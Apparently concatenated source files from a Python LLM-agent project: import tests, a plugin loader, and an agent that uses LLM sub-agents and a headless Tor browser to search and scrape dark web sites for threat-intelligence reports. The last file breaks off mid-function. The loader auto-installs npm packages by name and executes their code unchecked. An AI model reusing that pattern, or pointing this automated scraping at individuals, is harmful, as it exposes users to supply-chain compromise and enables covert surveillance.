"""Tests to verify all imports are correct and non-conflicting."""

import importlib
import sys
from collections import defaultdict

import pytest


class TestTopLevelImports:
    """Test top-level package imports."""

    def test_rlm_import(self):
        """Test that main rlm package can be imported."""
        import groknroll

        assert hasattr(groknroll, "RLM")
        assert "RLM" in groknroll.__all__

    def test_rlm_rlm_import(self):
        """Test that RLM class can be imported from groknroll."""
        from groknroll import RLM

        assert RLM is not None

    def test_rlm_core_rlm_import(self):
        """Test that RLM can be imported from groknroll.core.groknroll."""
        from groknroll.core.rlm import RLM

        assert RLM is not None


class TestClientImports:
    """Test client module imports."""

    def test_clients_module_import(self):
        """Test that clients module can be imported."""
        import groknroll.clients

        assert hasattr(groknroll.clients, "get_client")
        assert hasattr(groknroll.clients, "BaseLM")

    def test_base_lm_import(self):
        """Test BaseLM import."""
        from groknroll.clients.base_lm import BaseLM

        assert BaseLM is not None

    def test_openai_client_import(self):
        """Test OpenAIClient import."""
        pytest.importorskip("openai")
        from groknroll.clients.openai import OpenAIClient

        assert OpenAIClient is not None

    def test_anthropic_client_import(self):
        """Test AnthropicClient import."""
        pytest.importorskip("anthropic")
        from groknroll.clients.anthropic import AnthropicClient

        assert AnthropicClient is not None

    def test_portkey_client_import(self):
        """Test PortkeyClient import."""
        pytest.importorskip("portkey_ai")
        from groknroll.clients.portkey import PortkeyClient

        assert PortkeyClient is not None

    def test_litellm_client_import(self):
        """Test LiteLLMClient import."""
        pytest.importorskip("litellm")
        from groknroll.clients.litellm import LiteLLMClient

        assert LiteLLMClient is not None

    def test_get_client_function(self):
        """Test get_client function import."""
        from groknroll.clients import get_client

        assert callable(get_client)


class TestCoreImports:
    """Test core module imports."""

    def test_core_types_import(self):
        """Test core types imports."""
        from groknroll.core.types import (
            ClientBackend,
            CodeBlock,
            ModelUsageSummary,
            QueryMetadata,
            REPLResult,
            RLMIteration,
            RLMMetadata,
            UsageSummary,
        )

        assert ClientBackend is not None
        assert CodeBlock is not None
        assert ModelUsageSummary is not None
        assert QueryMetadata is not None
        assert REPLResult is not None
        assert RLMIteration is not None
        assert RLMMetadata is not None
        assert UsageSummary is not None

    def test_core_rlm_import(self):
        """Test core RLM import."""
        from groknroll.core.rlm import RLM

        assert RLM is not None

    def test_core_lm_handler_import(self):
        """Test LMHandler import."""
        from groknroll.core.lm_handler import LMHandler

        assert LMHandler is not None

    def test_core_comms_utils_import(self):
        """Test comms_utils imports."""
        from groknroll.core.comms_utils import (
            LMRequest,
            LMResponse,
            send_lm_request,
            send_lm_request_batched,
            socket_recv,
            socket_send,
        )

        assert LMRequest is not None
        assert LMResponse is not None
        assert callable(send_lm_request)
        assert callable(send_lm_request_batched)
        assert callable(socket_recv)
        assert callable(socket_send)


class TestEnvironmentImports:
    """Test environment module imports."""

    def test_environments_module_import(self):
        """Test that environments module can be imported."""
        import groknroll.environments

        assert hasattr(groknroll.environments, "get_environment")
        assert hasattr(groknroll.environments, "BaseEnv")
        assert hasattr(groknroll.environments, "LocalREPL")

    def test_base_env_import(self):
        """Test BaseEnv import."""
        from groknroll.environments.base_env import BaseEnv, IsolatedEnv, NonIsolatedEnv

        assert BaseEnv is not None
        assert IsolatedEnv is not None
        assert NonIsolatedEnv is not None

    def test_local_repl_import(self):
        """Test LocalREPL import."""
        from groknroll.environments.local_repl import LocalREPL

        assert LocalREPL is not None

    def test_modal_repl_import(self):
        """Test ModalREPL import."""
        pytest.importorskip("modal")
        from groknroll.environments.modal_repl import ModalREPL

        assert ModalREPL is not None

    def test_docker_repl_import(self):
        """Test DockerREPL import."""
        from groknroll.environments.docker_repl import DockerREPL

        assert DockerREPL is not None

    def test_prime_repl_import(self):
        """Test PrimeREPL import."""
        pytest.importorskip("prime_sandboxes")
        from groknroll.environments.prime_repl import PrimeREPL

        assert PrimeREPL is not None

    def test_get_environment_function(self):
        """Test get_environment function import."""
        from groknroll.environments import get_environment

        assert callable(get_environment)


class TestLoggerImports:
    """Test logger module imports."""

    def test_logger_module_import(self):
        """Test that logger module can be imported."""
        import groknroll.logger

        assert hasattr(groknroll.logger, "RLMLogger")
        assert hasattr(groknroll.logger, "VerbosePrinter")
        assert "RLMLogger" in groknroll.logger.__all__
        assert "VerbosePrinter" in groknroll.logger.__all__

    def test_rlm_logger_import(self):
        """Test RLMLogger import."""
        from groknroll.logger.rlm_logger import RLMLogger

        assert RLMLogger is not None

    def test_verbose_import(self):
        """Test VerbosePrinter import."""
        from groknroll.logger.verbose import VerbosePrinter

        assert VerbosePrinter is not None


class TestUtilsImports:
    """Test utils module imports."""

    def test_parsing_import(self):
        """Test parsing module import."""
        from groknroll.utils.parsing import (
            find_code_blocks,
            find_final_answer,
            format_execution_result,
            format_iteration,
        )

        assert callable(find_code_blocks)
        assert callable(find_final_answer)
        assert callable(format_iteration)
        assert callable(format_execution_result)

    def test_prompts_import(self):
        """Test prompts module import."""
        from groknroll.utils.prompts import (
            RLM_SYSTEM_PROMPT,
            USER_PROMPT,
            build_rlm_system_prompt,
            build_user_prompt,
        )

        assert RLM_SYSTEM_PROMPT is not None
        assert USER_PROMPT is not None
        assert callable(build_rlm_system_prompt)
        assert callable(build_user_prompt)

    def test_rlm_utils_import(self):
        """Test rlm_utils module import."""
        from groknroll.utils.rlm_utils import filter_sensitive_keys

        assert callable(filter_sensitive_keys)


class TestImportConflicts:
    """Test for import conflicts and naming issues."""

    def test_no_duplicate_names_in_rlm_all(self):
        """Test that __all__ in groknroll.__init__ has no duplicates."""
        import groknroll

        if hasattr(groknroll, "__all__"):
            all_items = groknroll.__all__
            assert len(all_items) == len(set(all_items)), (
                f"Duplicate items in groknroll.__all__: {all_items}"
            )

    def test_no_duplicate_names_in_logger_all(self):
        """Test that __all__ in groknroll.logger.__init__ has no duplicates."""
        import groknroll.logger

        if hasattr(groknroll.logger, "__all__"):
            all_items = groknroll.logger.__all__
            assert len(all_items) == len(set(all_items)), (
                f"Duplicate items in groknroll.logger.__all__: {all_items}"
            )

    def test_all_declarations_match_exports(self):
        """Test that __all__ declarations match actual exports."""
        import groknroll
        import groknroll.logger

        # Test groknroll.__all__
        if hasattr(groknroll, "__all__"):
            for name in groknroll.__all__:
                assert hasattr(groknroll, name), (
                    f"groknroll.__all__ declares '{name}' but it's not exported"
                )

        # Test groknroll.logger.__all__
        if hasattr(groknroll.logger, "__all__"):
            for name in groknroll.logger.__all__:
                assert hasattr(groknroll.logger, name), (
                    f"groknroll.logger.__all__ declares '{name}' but it's not exported"
                )

    def test_no_circular_imports(self):
        """Test that modules can be imported without circular import errors."""
        # Core modules that should always be importable
        core_modules = [
            "groknroll",
            "groknroll.clients",
            "groknroll.clients.base_lm",
            "groknroll.core",
            "groknroll.core.types",
            "groknroll.core.rlm",
            "groknroll.core.lm_handler",
            "groknroll.core.comms_utils",
            "groknroll.environments",
            "groknroll.environments.base_env",
            "groknroll.environments.local_repl",
            "groknroll.environments.docker_repl",
            "groknroll.logger",
            "groknroll.logger.rlm_logger",
            "groknroll.logger.verbose",
            "groknroll.utils",
            "groknroll.utils.parsing",
            "groknroll.utils.prompts",
            "groknroll.utils.rlm_utils",
        ]

        # Optional modules that may not be available
        optional_modules = [
            ("groknroll.clients.openai", "openai"),
            ("groknroll.clients.anthropic", "anthropic"),
            ("groknroll.clients.portkey", "portkey_ai"),
            ("groknroll.clients.litellm", "litellm"),
            ("groknroll.environments.modal_repl", "modal"),
            ("groknroll.environments.prime_repl", "prime_sandboxes"),
        ]

        # Test core modules
        for module_name in core_modules:
            # Remove from sys.modules if present to test fresh import
            if module_name in sys.modules:
                del sys.modules[module_name]
            try:
                importlib.import_module(module_name)
            except ImportError as e:
                pytest.fail(f"Failed to import {module_name}: {e}")

        # Test optional modules (skip if dependency not available)
        for module_name, dependency in optional_modules:
            # Check if dependency is available
            try:
                importlib.import_module(dependency)
            except ImportError:
                continue  # Skip this module if dependency not available

            # If dependency is available, test the module import
            if module_name in sys.modules:
                del sys.modules[module_name]
            try:
                importlib.import_module(module_name)
            except ImportError as e:
                pytest.fail(f"Failed to import {module_name}: {e}")

    def test_no_naming_conflicts_across_modules(self):
        """Test that there are no naming conflicts across different modules."""
        # Collect all public names from each module
        module_exports: dict[str, set[str]] = {}

        # Check main modules
        import groknroll
        import groknroll.clients
        import groknroll.environments
        import groknroll.logger

        if hasattr(groknroll, "__all__"):
            module_exports["groknroll"] = set(groknroll.__all__)
        else:
            module_exports["groknroll"] = {name for name in dir(groknroll) if not name.startswith("_")}

        if hasattr(groknroll.clients, "__all__"):
            module_exports["groknroll.clients"] = set(groknroll.clients.__all__)
        else:
            module_exports["groknroll.clients"] = {
                name for name in dir(groknroll.clients) if not name.startswith("_")
            }

        if hasattr(groknroll.environments, "__all__"):
            module_exports["groknroll.environments"] = set(groknroll.environments.__all__)
        else:
            module_exports["groknroll.environments"] = {
                name for name in dir(groknroll.environments) if not name.startswith("_")
            }

        if hasattr(groknroll.logger, "__all__"):
            module_exports["groknroll.logger"] = set(groknroll.logger.__all__)
        else:
            module_exports["groknroll.logger"] = {
                name for name in dir(groknroll.logger) if not name.startswith("_")
            }

        # Check for conflicts (same name in multiple modules)
        name_to_modules: dict[str, list[str]] = defaultdict(list)
        for module_name, exports in module_exports.items():
            for export_name in exports:
                name_to_modules[export_name].append(module_name)

        conflicts = {name: modules for name, modules in name_to_modules.items() if len(modules) > 1}
        # Filter out common Python builtins/dunders and typing imports that are expected
        expected_duplicates = {
            "__file__",
            "__name__",
            "__package__",
            "__path__",
            "__doc__",
            "__loader__",
            "__spec__",
            "__cached__",
            "Any",  # Common typing import
            "Literal",  # Common typing import
            "Optional",  # Common typing import
            "Union",  # Common typing import
            "Dict",  # Common typing import
            "List",  # Common typing import
            "Tuple",  # Common typing import
            "Callable",  # Common typing import
        }
        conflicts = {
            name: modules for name, modules in conflicts.items() if name not in expected_duplicates
        }

        if conflicts:
            conflict_msg = "\n".join(
                f"  '{name}' exported from: {', '.join(modules)}"
                for name, modules in conflicts.items()
            )
            pytest.fail(f"Found naming conflicts across modules:\n{conflict_msg}")


class TestImportCompleteness:
    """Test that all expected imports are available."""

    def test_all_client_classes_importable(self):
        """Test that all client classes can be imported."""
        from groknroll.clients.base_lm import BaseLM

        # Verify BaseLM is a class
        assert isinstance(BaseLM, type)

        # Test optional client classes
        try:
            pytest.importorskip("openai")
            from groknroll.clients.openai import OpenAIClient

            assert isinstance(OpenAIClient, type)
        except Exception:
            pass

        try:
            pytest.importorskip("anthropic")
            from groknroll.clients.anthropic import AnthropicClient

            assert isinstance(AnthropicClient, type)
        except Exception:
            pass

        try:
            pytest.importorskip("portkey_ai")
            from groknroll.clients.portkey import PortkeyClient

            assert isinstance(PortkeyClient, type)
        except Exception:
            pass

        try:
            pytest.importorskip("litellm")
            from groknroll.clients.litellm import LiteLLMClient

            assert isinstance(LiteLLMClient, type)
        except Exception:
            pass

    def test_all_environment_classes_importable(self):
        """Test that all environment classes can be imported."""
        from groknroll.environments.base_env import BaseEnv, IsolatedEnv, NonIsolatedEnv
        from groknroll.environments.docker_repl import DockerREPL
        from groknroll.environments.local_repl import LocalREPL

        # Verify they're all classes
        assert isinstance(BaseEnv, type)
        assert isinstance(IsolatedEnv, type)
        assert isinstance(NonIsolatedEnv, type)
        assert isinstance(LocalREPL, type)
        assert isinstance(DockerREPL, type)

        # Test optional ModalREPL
        try:
            pytest.importorskip("modal")
            from groknroll.environments.modal_repl import ModalREPL

            assert isinstance(ModalREPL, type)
        except Exception:
            pass

        # Test optional PrimeREPL
        try:
            pytest.importorskip("prime_sandboxes")
            from groknroll.environments.prime_repl import PrimeREPL

            assert isinstance(PrimeREPL, type)
        except Exception:
            pass



"""
Plugin Loaders

Provides mechanisms to load plugins from:
- Local Python files/packages
- NPM packages
"""

import importlib.util
import json
import logging
import subprocess
import sys
from abc import ABC, abstractmethod
from pathlib import Path
from typing import Optional

from groknroll.plugins.base import Plugin, PluginConfig, PluginStatus

logger = logging.getLogger(__name__)


class PluginLoader(ABC):
    """Base class for plugin loaders"""

    @abstractmethod
    def can_load(self, source: str) -> bool:
        """Check if this loader can handle the source"""
        pass

    @abstractmethod
    def load(self, source: str, config: Optional[PluginConfig] = None) -> Optional[Plugin]:
        """Load a plugin from the source"""
        pass


class LocalPluginLoader(PluginLoader):
    """
    Load plugins from local Python files or packages

    Supports:
    - Single .py files with Plugin subclass
    - Python packages with plugin.py entry point
    """

    def can_load(self, source: str) -> bool:
        """Check if source is a local path"""
        path = Path(source)
        return path.exists() and (path.suffix == ".py" or path.is_dir())

    def load(self, source: str, config: Optional[PluginConfig] = None) -> Optional[Plugin]:
        """Load a plugin from local path"""
        path = Path(source).resolve()

        try:
            if path.is_file() and path.suffix == ".py":
                return self._load_from_file(path)
            elif path.is_dir():
                return self._load_from_package(path)
            else:
                logger.error(f"Invalid plugin source: {source}")
                return None
        except Exception as e:
            logger.error(f"Failed to load plugin from {source}: {e}")
            return None

    def _load_from_file(self, path: Path) -> Optional[Plugin]:
        """Load plugin from a single Python file"""
        spec = importlib.util.spec_from_file_location(path.stem, path)
        if spec is None or spec.loader is None:
            return None

        module = importlib.util.module_from_spec(spec)
        sys.modules[path.stem] = module
        spec.loader.exec_module(module)

        # Find Plugin subclass
        for attr_name in dir(module):
            attr = getattr(module, attr_name)
            if isinstance(attr, type) and issubclass(attr, Plugin) and attr is not Plugin:
                return attr()

        logger.warning(f"No Plugin subclass found in {path}")
        return None

    def _load_from_package(self, path: Path) -> Optional[Plugin]:
        """Load plugin from a Python package"""
        plugin_file = path / "plugin.py"
        if not plugin_file.exists():
            plugin_file = path / "__init__.py"

        if not plugin_file.exists():
            logger.error(f"No plugin.py or __init__.py found in {path}")
            return None

        return self._load_from_file(plugin_file)


class NPMPluginLoader(PluginLoader):
    """
    Load plugins from NPM packages

    NPM plugins must have a groknroll.json manifest with:
    - name: Plugin name
    - version: Plugin version
    - main: Entry point (Python file)
    """

    def __init__(self, npm_prefix: Optional[Path] = None):
        self.npm_prefix = npm_prefix or Path.home() / ".groknroll" / "plugins"

    def can_load(self, source: str) -> bool:
        """Check if source looks like an NPM package"""
        return source.startswith("npm:") or "@" in source or "/" not in source

    def load(self, source: str, config: Optional[PluginConfig] = None) -> Optional[Plugin]:
        """Load plugin from NPM"""
        package_name = source.replace("npm:", "")

        try:
            # Install package if not already installed
            package_path = self._get_package_path(package_name)
            if not package_path.exists():
                self._install_package(package_name)
                package_path = self._get_package_path(package_name)

            if not package_path.exists():
                logger.error(f"Package not found after install: {package_name}")
                return None

            # Load manifest
            manifest = self._load_manifest(package_path)
            if not manifest:
                return None

            # Load plugin
            entry_point = package_path / manifest.get("main", "plugin.py")
            if not entry_point.exists():
                logger.error(f"Entry point not found: {entry_point}")
                return None

            loader = LocalPluginLoader()
            return loader.load(str(entry_point), config)

        except Exception as e:
            logger.error(f"Failed to load NPM plugin {package_name}: {e}")
            return None

    def _get_package_path(self, package_name: str) -> Path:
        """Get local path for an NPM package"""
        return self.npm_prefix / "node_modules" / package_name

    def _install_package(self, package_name: str) -> None:
        """Install an NPM package"""
        self.npm_prefix.mkdir(parents=True, exist_ok=True)

        # Initialize package.json if needed
        package_json = self.npm_prefix / "package.json"
        if not package_json.exists():
            package_json.write_text(json.dumps({"name": "groknroll-plugins", "private": True}))

        # Install package
        subprocess.run(
            ["npm", "install", package_name],
            cwd=self.npm_prefix,
            capture_output=True,
            check=True,
        )

    def _load_manifest(self, package_path: Path) -> Optional[dict]:
        """Load groknroll.json manifest"""
        manifest_file = package_path / "groknroll.json"
        if manifest_file.exists():
            return json.loads(manifest_file.read_text())

        # Fall back to package.json
        package_json = package_path / "package.json"
        if package_json.exists():
            return json.loads(package_json.read_text())

        return None


def load_plugin(source: str, config: Optional[PluginConfig] = None) -> Optional[Plugin]:
    """
    Load a plugin from any supported source

    Args:
        source: Plugin source (local path or NPM package)
        config: Optional plugin configuration

    Returns:
        Loaded Plugin or None if loading failed
    """
    loaders = [LocalPluginLoader(), NPMPluginLoader()]

    for loader in loaders:
        if loader.can_load(source):
            plugin = loader.load(source, config)
            if plugin:
                plugin._status = PluginStatus.LOADED
                return plugin

    logger.error(f"No loader could handle source: {source}")
    return None



"""
Enhanced OSINT Agent - Advanced dark web reconnaissance with browser automation

Extends the base OSINT agent with:
- LLM-controlled browser automation via Tor
- Multi-agent hierarchy for parallel investigations
- Secrets management for credentials
- Evidence capture and archival
- Extension hooks for customization
"""

import asyncio
import time
from dataclasses import dataclass, field
from datetime import datetime
from pathlib import Path
from typing import Any, Callable, Optional

from groknroll.agents.base_agent import AgentCapability, AgentConfig, AgentResponse
from groknroll.agents.hierarchy import (
    AgentProfile,
    AgentRole,
    DEFAULT_PROFILES,
    HierarchicalAgent,
    InterventionException,
)
from groknroll.agents.osint_agent import InvestigationResult, OsintAgent
from groknroll.core.extensions import HookPoint, execute_hook, get_extension_manager
from groknroll.core.secrets import SecretsManager, get_secrets_manager
from groknroll.osint.artifact_extractor import Artifact
from groknroll.osint.content_scraper import ScrapedContent
from groknroll.osint.dark_web_search import SearchResult
from groknroll.osint.tor_manager import TorManager

# Optional browser automation
try:
    from groknroll.osint.browser_automation import (
        BrowserAction,
        BrowserAgentTask,
        BrowserResult,
        BrowserState,
        TorBrowserAutomation,
    )

    BROWSER_AVAILABLE = True
except ImportError:
    BROWSER_AVAILABLE = False


# OSINT-specific agent profiles
OSINT_PROFILES: dict[str, AgentProfile] = {
    "osint_lead": AgentProfile(
        role=AgentRole.ANALYST,
        name="OSINT Lead",
        system_prompt="""You are a senior OSINT analyst leading dark web investigations.
Coordinate subordinate agents, prioritize targets, and synthesize intelligence.
Focus on identifying threats, actors, and actionable intelligence.""",
        capabilities=[
            AgentCapability.READ_FILES,
            AgentCapability.WRITE_FILES,
            AgentCapability.SEARCH_CODE,
            AgentCapability.ANALYZE_CODE,
        ],
        model="gpt-4o",
        max_subordinates=5,
        can_spawn_subordinates=True,
    ),
    "search_agent": AgentProfile(
        role=AgentRole.RESEARCHER,
        name="Search Specialist",
        system_prompt="""You are a search specialist for dark web reconnaissance.
Identify relevant search terms, explore search engines, and find targets.
Report findings to your superior agent.""",
        capabilities=[
            AgentCapability.READ_FILES,
            AgentCapability.SEARCH_CODE,
        ],
        model="gpt-4o-mini",
        can_spawn_subordinates=False,
    ),
    "scraper_agent": AgentProfile(
        role=AgentRole.RESEARCHER,
        name="Content Scraper",
        system_prompt="""You are a content extraction specialist.
Navigate dark web sites, extract relevant content, and capture evidence.
Use browser automation for interactive sites when needed.""",
        capabilities=[
            AgentCapability.READ_FILES,
            AgentCapability.WRITE_FILES,
        ],
        model="gpt-4o-mini",
        can_spawn_subordinates=False,
    ),
    "analyst_agent": AgentProfile(
        role=AgentRole.ANALYST,
        name="Intelligence Analyst",
        system_prompt="""You are an intelligence analyst for OSINT operations.
Analyze extracted content, identify patterns, and assess threats.
Provide actionable intelligence recommendations.""",
        capabilities=[
            AgentCapability.READ_FILES,
            AgentCapability.ANALYZE_CODE,
        ],
        model="gpt-4o",
        can_spawn_subordinates=False,
    ),
}


@dataclass
class BrowserEvidence:
    """Evidence captured via browser automation."""

    url: str
    title: str
    screenshot_path: Optional[str] = None
    content_path: Optional[str] = None
    artifacts: list[Artifact] = field(default_factory=list)
    timestamp: datetime = field(default_factory=datetime.utcnow)
    metadata: dict[str, Any] = field(default_factory=dict)


@dataclass
class EnhancedInvestigationResult(InvestigationResult):
    """Extended investigation result with browser evidence."""

    browser_evidence: list[BrowserEvidence] = field(default_factory=list)
    subordinate_reports: list[dict[str, Any]] = field(default_factory=list)
    intervention_occurred: bool = False
    total_agents_used: int = 1


class EnhancedOsintAgent(HierarchicalAgent):
    """
    Enhanced OSINT Agent with browser automation and multi-agent support.

    Extends HierarchicalAgent to provide:
    - LLM-controlled Tor browser for interactive sites
    - Multi-agent hierarchy for parallel investigations
    - Secrets management for credentials
    - Evidence capture and archival
    - Extension hooks for customization

    Usage:
        agent = EnhancedOsintAgent(project_path=Path("."))

        # Simple investigation
        result = await agent.investigate("ransomware lockbit")

        # Deep investigation with browser
        result = await agent.deep_investigate(
            "threat actor APT29",
            use_browser=True,
            parallel=True
        )

    Requires:
        - Tor daemon on localhost:9050
        - playwright (for browser automation)
    """

    def __init__(
        self,
        project_path: Path,
        backend: str = "anthropic",
        model: str = "claude-sonnet-4-20250514",
        tor_host: str = "127.0.0.1",
        tor_port: int = 9050,
        max_workers: int = 5,
        output_dir: Optional[Path] = None,
        secrets_manager: Optional[SecretsManager] = None,
    ):
        """
        Initialize Enhanced OSINT Agent.

        Args:
            project_path: Project root path
            backend: LLM backend
            model: LLM model identifier
            tor_host: Tor proxy host
            tor_port: Tor proxy port
            max_workers: Concurrent workers
            output_dir: Report output directory
            secrets_manager: Optional secrets manager
        """
        # Create agent config
        config = AgentConfig(
            name="enhanced_osint",
            description="Enhanced OSINT agent with browser automation",
            capabilities=[
                AgentCapability.READ_FILES,
                AgentCapability.WRITE_FILES,
                AgentCapability.SEARCH_CODE,
                AgentCapability.ANALYZE_CODE,
            ],
            model=model,
            max_cost=20.0,
            timeout=1200,
        )

        # Initialize hierarchical agent
        super().__init__(
            config=config,
            project_path=project_path,
            profile=OSINT_PROFILES["osint_lead"],
            agent_number=0,
        )

        # Store configuration
        self.backend = backend
        self.tor_host = tor_host
        self.tor_port = tor_port
        self.max_workers = max_workers
        self.output_dir = output_dir or project_path / "osint_reports"
        self.output_dir.mkdir(parents=True, exist_ok=True)

        # Initialize components
        self._base_osint = OsintAgent(
            project_path=project_path,
            backend=backend,
            model=model,
            tor_host=tor_host,
            tor_port=tor_port,
            max_workers=max_workers,
            output_dir=self.output_dir,
        )

        self._secrets = secrets_manager or get_secrets_manager(project_path)
        self._browser: Optional[TorBrowserAutomation] = None
        self._browser_task: Optional[BrowserAgentTask] = None

        # Investigation state
        self._current_investigation: Optional[str] = None
        self._evidence: list[BrowserEvidence] = []

    @property
    def tor_manager(self) -> TorManager:
        """Get TorManager from base agent."""
        return self._base_osint.tor_manager

    @property
    def browser_available(self) -> bool:
        """Check if browser automation is available."""
        return BROWSER_AVAILABLE

    async def start_browser(self) -> bool:
        """
        Start the Tor browser.

        Returns:
            True if started successfully
        """
        if not BROWSER_AVAILABLE:
            return False

        if self._browser is not None:
            return True

        try:
            self._browser = TorBrowserAutomation(
                tor_manager=self.tor_manager,
                headless=True,
                user_data_dir=str(self.output_dir / "browser_data"),
            )
            await self._browser.start()
            self._browser_task = BrowserAgentTask(self.tor_manager)
            return True
        except Exception as e:
            self._browser = None
            return False

    async def stop_browser(self) -> None:
        """Stop the Tor browser."""
        if self._browser:
            await self._browser.close()
            self._browser = None
            self._browser_task = None

    def execute(self, task: str, context: Optional[dict[str, Any]] = None) -> AgentResponse:
        """
        Execute OSINT task synchronously.

        Args:
            task: Investigation query
            context: Additional options

        Returns:
            AgentResponse
        """
        try:
            loop = asyncio.get_event_loop()
            if loop.is_running():
                import concurrent.futures

                with concurrent.futures.ThreadPoolExecutor() as pool:
                    future = pool.submit(
                        asyncio.run,
                        self.execute_async(task, context),
                    )
                    return future.result()
            else:
                return loop.run_until_complete(self.execute_async(task, context))
        except RuntimeError:
            return asyncio.run(self.execute_async(task, context))

    async def execute_async(
        self,
        task: str,
        context: Optional[dict[str, Any]] = None,
    ) -> AgentResponse:
        """
        Execute OSINT task asynchronously.

        Args:
            task: Investigation query
            context: Additional options (deep, use_browser, parallel)

        Returns:
            AgentResponse
        """
        start_time = time.time()
        context = context or {}

        # Execute pre-hook
        hook_ctx = await execute_hook(
            HookPoint.MONOLOGUE_START,
            self,
            {"task": task, "context": context},
        )

        if hook_ctx.cancelled:
            return AgentResponse(
                success=False,
                message="Investigation cancelled",
                agent_name=self.agent_name,
                task=task,
            )

        try:
            # Determine investigation type
            deep = context.get("deep", False)
            use_browser = context.get("use_browser", False)
            parallel = context.get("parallel", False)

            if deep:
                result = await self.deep_investigate(
                    task,
                    use_browser=use_browser,
                    parallel=parallel,
                )
            else:
                result = await self.investigate(task)

            elapsed = time.time() - start_time

            # Execute post-hook
            await execute_hook(
                HookPoint.MONOLOGUE_END,
                self,
                {"task": task, "result": result},
            )

            response = AgentResponse(
                success=result.status == "complete",
                message=self._format_result(result),
                agent_name=self.agent_name,
                task=task,
                time=elapsed,
                metadata={
                    "results_count": result.results_count,
                    "scraped_count": result.scraped_count,
                    "artifacts_count": result.artifacts_count,
                    "report_path": str(result.report_path) if result.report_path else None,
                },
            )

            self._log_execution(response)
            return response

        except InterventionException as e:
            return AgentResponse(
                success=False,
                message=f"Intervention: {str(e)}",
                agent_name=self.agent_name,
                task=task,
                time=time.time() - start_time,
            )

        except Exception as e:
            await execute_hook(
                HookPoint.ERROR_OCCURRED,
                self,
                {"error": e, "task": task},
            )

            return AgentResponse(
                success=False,
                message=f"Investigation failed: {str(e)}",
                agent_name=self.agent_name,
                task=task,
                time=time.time() - start_time,
            )

    async def investigate(self, query: str) -> InvestigationResult:
        """
        Run basic OSINT investigation.

        Args:
            query: Search query

        Returns:
            InvestigationResult
        """
        # Mask any secrets in query
        safe_query = self._secrets.mask(query)

        # Run base investigation
        return self._base_osint.investigate(safe_query, deep=False)

    async def deep_investigate(
        self,
        query: str,
        use_browser: bool = True,
        parallel: bool = True,
        max_browser_pages: int = 10,
    ) -> EnhancedInvestigationResult:
        """
        Run deep OSINT investigation with optional browser automation.

        Args:
            query: Search query
            use_browser: Use browser for interactive sites
            parallel: Use subordinate agents for parallel work
            max_browser_pages: Maximum pages to visit with browser

        Returns:
            EnhancedInvestigationResult
        """
        start_time = time.time()
        self._current_investigation = query
        self._evidence = []
        subordinate_reports = []
        total_agents = 1

        # Check Tor connectivity
        if not self.tor_manager.check_connection():
            return EnhancedInvestigationResult(
                query=query,
                refined_query=query,
                search_results=[],
                scraped_contents=[],
                artifacts=[],
                report=None,
                report_path=None,
                duration=time.time() - start_time,
                status="failed",
                error="Tor proxy not available",
                browser_evidence=[],
                subordinate_reports=[],
                total_agents_used=1,
            )

        # Phase 1: Basic investigation
        base_result = self._base_osint.investigate(query, deep=True, save_report=False)

        # Phase 2: Browser automation for top results
        browser_evidence = []
        if use_browser and BROWSER_AVAILABLE and base_result.search_results:
            try:
                await self.start_browser()

                # Select top results for browser investigation
                top_urls = [r.url for r in base_result.search_results[:max_browser_pages]]
                browser_evidence = await self._browser_investigate(top_urls)

            except Exception as e:
                # Browser failed, continue without it
                pass
            finally:
                await self.stop_browser()

        # Phase 3: Parallel subordinate investigation (if enabled)
        if parallel and len(base_result.search_results) > 20:
            try:
                # Spawn analysis subordinate
                analyst = await self.spawn_subordinate(
                    f"Analyze OSINT findings for: {query}",
                    profile=OSINT_PROFILES["analyst_agent"],
                )
                total_agents += 1

                # Delegate analysis
                analysis_task = await self.delegate_task(
                    f"Analyze the following artifacts and provide threat assessment:\n"
                    f"Query: {query}\n"
                    f"Artifacts found: {len(base_result.artifacts)}\n"
                    f"Key findings: {base_result.search_results[:5]}",
                    role=AgentRole.ANALYST,
                    wait=True,
                )

                if analysis_task.result:
                    subordinate_reports.append({
                        "agent": analyst.agent_name,
                        "task": analysis_task.description,
                        "status": analysis_task.status,
                        "result": analysis_task.result.message,
                    })

            except Exception as e:
                # Subordinate failed, continue
                pass

        # Combine all artifacts
        all_artifacts = list(base_result.artifacts)
        for evidence in browser_evidence:
            all_artifacts.extend(evidence.artifacts)

        # Generate final report
        report_path = None
        if self._base_osint.reporter:
            markdown = self._base_osint.reporter.generate(
                query=query,
                refined_query=base_result.refined_query,
                results=base_result.search_results,
                scraped_contents=base_result.scraped_contents,
                artifacts=all_artifacts,
                report=base_result.report,
            )

            # Add browser evidence section
            if browser_evidence:
                markdown += "\n\n## Browser Evidence\n\n"
                for evidence in browser_evidence:
                    markdown += f"### {evidence.title}\n"
                    markdown += f"- URL: {evidence.url}\n"
                    markdown += f"- Timestamp: {evidence.timestamp.isoformat()}\n"
                    if evidence.screenshot_path:
                        markdown += f"- Screenshot: {evidence.screenshot_path}\n"
                    if evidence.artifacts:
                        markdown += f"- Artifacts: {len(evidence.artifacts)}\n"
                    markdown += "\n"

            # Add subordinate reports
            if subordinate_reports:
                markdown += "\n\n## Subordinate Agent Reports\n\n"
                for report in subordinate_reports:
                    markdown += f"### {report['agent']}\n"
                    markdown += f"**Task:** {report['task']}\n\n"
                    markdown += f"**Status:** {report['status']}\n\n"
                    markdown += f"**Result:**\n{report['result']}\n\n"

            report_path = self._base_osint.reporter.save(markdown)

        return EnhancedInvestigationResult(
            query=query,
            refined_query=base_result.refined_query,
            search_results=base_result.search_results,
            scraped_contents=base_result.scraped_contents,
            artifacts=all_artifacts,
            report=base_result.report,
            report_path=report_path,
            duration=time.time() - start_time,
            status="complete",
            browser_evidence=browser_evidence,
            subordinate_reports=subordinate_reports,
            total_agents_used=total_agents,
        )

    async def _browser_investigate(
        self,
        urls: list[str],
    ) -> list[BrowserEvidence]:
        """
        Investigate URLs using browser automation.

        Args:
            urls: URLs to visit

        Returns:
            List of BrowserEvidence
        """
        evidence_list = []

        if not self._browser:
            return evidence_list

        evidence_dir = self.output_dir / "evidence" / datetime.utcnow().strftime("%Y%m%d_%H%M%S")
        evidence_dir.mkdir(parents=True, exist_ok=True)

        for i, url in enumerate(urls):
            try:
                # Navigate to URL
                state = await self._browser.navigate(url)

                # Take screenshot
                screenshot_b64 = await self._browser.screenshot(full_page=True)
                screenshot_path = evidence_dir / f"page_{i:03d}.png"

                import base64

                with open(screenshot_path, "wb") as f:
                    f.write(base64.b64decode(screenshot_b64))

                # Save content
                content = state.page_content or ""
                content_path = evidence_dir / f"page_{i:03d}.txt"
                with open(content_path, "w", encoding="utf-8") as f:
                    f.write(f"URL: {state.url}\n")
                    f.write(f"Title: {state.title}\n")
